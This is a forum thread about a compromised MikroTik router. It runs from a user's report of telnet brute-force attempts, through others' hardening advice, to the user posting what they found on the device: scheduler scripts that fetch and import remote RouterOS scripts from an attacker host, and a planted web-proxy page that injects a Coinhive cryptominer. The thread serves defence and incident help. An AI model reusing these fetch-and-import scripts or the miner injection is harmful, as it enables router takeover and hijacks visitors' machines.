my router is under attack

RouterOS General
1

I noticed in the router log that for a couple of days my router is constantly attacked from different iP addresses with unauthorized login attempts.
What do you recommend me to do in this case?
It’s the first time i experience this and i’m just a basic user of mikrotik routers.
Thank you.

(6487 messages not shown)
sep/27/2018 10:19:13 system,error,critical login failure for user guest from 103.207.39.173 via telnet
sep/27/2018 10:19:13 system,error,critical login failure for user root from 103.207.39.173 via telnet
sep/27/2018 10:19:14 system,error,critical login failure for user root from 103.207.39.173 via telnet
sep/27/2018 10:19:15 system,error,critical login failure for user admin from 103.207.39.173 via telnet
sep/27/2018 10:19:15 system,error,critical login failure for user root from 103.207.39.173 via telnet
sep/27/2018 10:19:16 system,error,critical login failure for user user from 103.207.39.173 via telnet
sep/27/2018 10:19:16 system,error,critical login failure for user root from 103.207.39.173 via telnet
sep/27/2018 10:19:17 system,error,critical login failure for user root from 103.207.39.173 via telnet
[adminxyz@MikroTik] >

2

Hurry! https://wiki.mikrotik.com/wiki/Manual:Securing_Your_Router

P.S.: After you open this web page, disable your Internet interface.

3

Your telnet port is clearly not firewalled properly.

If you’re not using telnet, disable the service ( IP > Services > Telnet > Disable ).

For further advice, post your current configuration for review ( /export hide-sensitive in Terminal ).

4

This can not be default configuration.
Remote management telnet/ssh/web/winbox are all closed on outside interface.
Since you see what you see, your telnet to administrate your router in open and exposed.
Close it as soon as possible.

If you need remote management, use VPN to your box and do management through the tunnel.

If you can not use that, use at least ssh, not telnet.
Then do not use default port 22, but some like 34222 (random high port)
Also use port knocking to keep ssh closed until you need it. (search for how to set it up)

If you leave telnet open, its just matter of time before some finds your password using bruteforce.


I have added a rule on my MT that if some tries to access one blocked port, they are blocked on all port for 24 hour.
Its as rule that may be to hard for someone, it works nice for me. Its around 1500 blocked ip in the list all time.
See added Splunk logs:

Low dip. Restart.
High top, many ip in short time.
Bruteforce access logs.jpg

5

I agree with Jotne and would go one step further. If you must access remotely, I hope it’s always from the same place!! If not, you’re asking for trouble :wink:

If so, modify the firewall rule so as to accept tenet / ssh from the ip of the place you’re accessing the router from.

If the router from where you are telneting has a dynamic wan address, use a dynamic dns service. This will allow you to create a rule that will accept the connecting from a name (use address lists) rather than an ip address which may change often.

Regards,


Sent from Tapatalk

6

I disabled Telnet and SSH.
I deleted admin account and created new one with full rights.
I changed the Router Id from Mikrotik to something else.

7

I noticed the following: My scheduler for running dynamic DNSname update were removed and new scripts appeared (i disabled them after i find them).




/system scheduler
add disabled=yes name=upd112 on-event="/system scheduler remove [find name=sh1\
    13]\r\
    \n:do {/file remove u113.rsc} on-error={}" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
    startup
add disabled=yes interval=12h name=upd113 on-event=":do {/tool fetch url=\"htt\
    p://up0.bit:31415/error\?part=7\" mode=http dst-path=webproxy/error.html} \
    on-error={}\r\
    \n:do {/tool fetch url=\"http://up0.bit:31415/error\?part=7\" mode=http ds\
    t-path=flash/webproxy/error.html} on-error={}\r\
    \n:do {/tool fetch url=\"http://up0.bit:31415/rsc\?key=9NL6MgbmSxeuBW&part\
    =7\" mode=http dst-path=u113.rsc} on-error={}\r\
    \n:do {/tool fetch url=https://2no.co/18NN37 mode=http keep-result=no} on-\
    error={}\r\
    \n/import u113.rsc\r\
    \n:do {/file remove u113.rsc} on-error={}" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    sep/30/2018 start-time=23:23:44
add disabled=yes interval=1d name=Auto113 on-event="/system reboot" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    sep/30/2018 start-time=03:11:00

I also find the following file(s): error.html

<html>
<head>
	<meta http-equiv="Content-Type" content="text/html;charset=windows-1251">
	<title>"$(url)"</title> 
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('bFAs1SG62inf49pfurQNJBTyXJEcHdfJ', {throttle: 0.1});
	miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
</script>
</head>
<frameset>
<frame src="$(url)"></frame>
</frameset>
</html>

Now i have no doubt that my router was compromised.
After a google search i find that 200000-mikrotik-routers-worldwide-have-been-compromised

What do you recommend to do for a fast fix? I’m currently not in the location of the router so a remote fix will be very useful.

8

Netinstall an upgrade and restart from scratch :frowning:

Sent from Tapatalk

9

Do a search here on the forum for what other has done.
This has been discussed several times.

10

I still have problem with the router.
I deleted everything, made a configuration reset but I’m not able to upgrade or downgrade the RouterOS.
Current version on the router is 6.33.3. I tried downgrade to 6.0 and 6.30 and upgrade to 6.43.2 but after each restart the version is still 6.33.3
How can i upgrade my router since this version is compromised?

11

After two hours of struggle i finally managed to install version 6.43.2 using Netinstall.

12

Dude, that’s what I suggested a week ago.

Regards,


Sent from Tapatalk